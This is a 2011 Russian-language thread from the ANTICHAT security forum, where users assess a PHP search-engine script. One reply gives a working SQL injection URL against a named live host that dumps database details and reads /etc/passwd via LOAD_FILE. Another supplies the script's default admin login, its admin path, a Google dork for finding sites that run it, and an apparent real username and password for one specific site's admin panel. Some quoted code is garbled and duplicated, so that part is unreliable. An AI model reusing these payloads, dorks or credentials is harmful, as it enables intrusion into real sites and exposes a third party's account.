HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.10.2011, 18:16
naPrikole
Новичок
Регистрация: 13.10.2011
Сообщений: 12
Провел на форуме:
2525

Репутация: 0
По умолчанию

народ мне нужно ваше мнение стоит ли использовать вот http://magicsearch.pp.ua cms вот ДЕМО ой сори эт наверно не cms а скрипт
 
Ответить с цитированием

  #2  
Старый 18.10.2011, 19:25
HIMIKAT
Участник форума
Регистрация: 12.01.2007
Сообщений: 117
Провел на форуме:
795261

Репутация: 28
По умолчанию

По ссылке даже не переходил, но уже одно то, что сайт на фришном домене, дает как минимум 50%, что это какая-то хренатень.
 
Ответить с цитированием

  #3  
Старый 18.10.2011, 19:40
Exandr
Познающий
Регистрация: 21.08.2010
Сообщений: 97
Провел на форуме:
22649

Репутация: 0
По умолчанию

А там написано скрипт поисковой ситемы) причем тут CMS
 
Ответить с цитированием

  #4  
Старый 18.10.2011, 19:47
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748

Репутация: 78
По умолчанию

Oops..

Need: magic_quotes =Off

install.php

[PHP]
[COLOR="#000000"][...]

if(isset($_POST['go_ed'])) {

if (!is_writable("settings/database.php")) {

print "Файла database.php несуществует или незаданы права доступа 666";

} else {

$fhandle=fopen("settings/database.php","w");

fwrite($fhandle,"[COLOR="#0000BB"]
 
Ответить с цитированием

  #5  
Старый 18.10.2011, 21:34
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748

Репутация: 78
По умолчанию

http://23rus.sytes.net/static.php?str='+and+1=2+union+select+1,2,concat_w s(0x3a,version(),user(),database()),LOAD_FILE('/etc/passwd')+--+

Сноси в общем.

Код писала курица.

p.s. не юзай юзера root. у него FILE_PRIV как минимум включен, и имеет он доступ ко всем базам данных.
 
Ответить с цитированием

  #6  
Старый 18.10.2011, 21:53
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

Цитата:
Сообщение от Boolean  
http://23rus.sytes.net/static.php?str='+and+1=2+union+select+1,2,concat_w s(0x3a,version(),user(),database()),LOAD_FILE('/etc/passwd')+--+
Сноси в общем.
Код писала курица.
p.s. не юзай юзера root. у него FILE_PRIV как минимум включен, и имеет он доступ ко всем базам данных.
на многих сайтах логин/пароль - moders

админка - /admin/

Google Dork:"Created by Kiria-Studio"

http://search.afu-time.com/admin/index.php - sorokin96:25101996 (не тот ли это кирил - разработчик? )
 
Ответить с цитированием

  #7  
Старый 19.10.2011, 01:49
naPrikole
Новичок
Регистрация: 13.10.2011
Сообщений: 12
Провел на форуме:
2525

Репутация: 0
По умолчанию

Цитата:
Сообщение от Exandr  
А там написано скрипт поисковой ситемы) причем тут CMS
да эт я чуток попутал
 
Ответить с цитированием

  #8  
Старый 19.10.2011, 01:51
naPrikole
Новичок
Регистрация: 13.10.2011
Сообщений: 12
Провел на форуме:
2525

Репутация: 0
По умолчанию

[QUOTE="Boolean"]
Oops..
Need: magic_quotes =Off
install.php
[PHP]
[COLOR="#000000"][...]

if(isset($_POST['go_ed'])) {

if (!is_writable("settings/database.php")) {

print "Файла database.php несуществует или незаданы права доступа 666";

} else {

$fhandle=fopen("settings/database.php","w");

fwrite($fhandle,"[COLOR="#0000BB"]Файла database.php несуществует или незаданы права досту па 666";

} else {

$fhandle=fopen("settings/database.php","w");

fwrite($fhandle,"[COLOR="#0000BB"]
 
Ответить с цитированием

  #9  
Старый 19.10.2011, 01:55
naPrikole
Новичок
Регистрация: 13.10.2011
Сообщений: 12
Провел на форуме:
2525

Репутация: 0
По умолчанию

Цитата:
Сообщение от HIMIKAT  
По ссылке даже не переходил, но уже одно то, что сайт на фришном домене, дает как минимум 50%, что это какая-то хренатень.
ясен хрен он фришный я же на своем компе сайт повесил
 
Ответить с цитированием

  #10  
Старый 10.11.2011, 22:56
Letcher
Познающий
Регистрация: 10.11.2011
Сообщений: 44
Провел на форуме:
13173

Репутация: 0
По умолчанию

всмысле на своем компе? на сервере?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.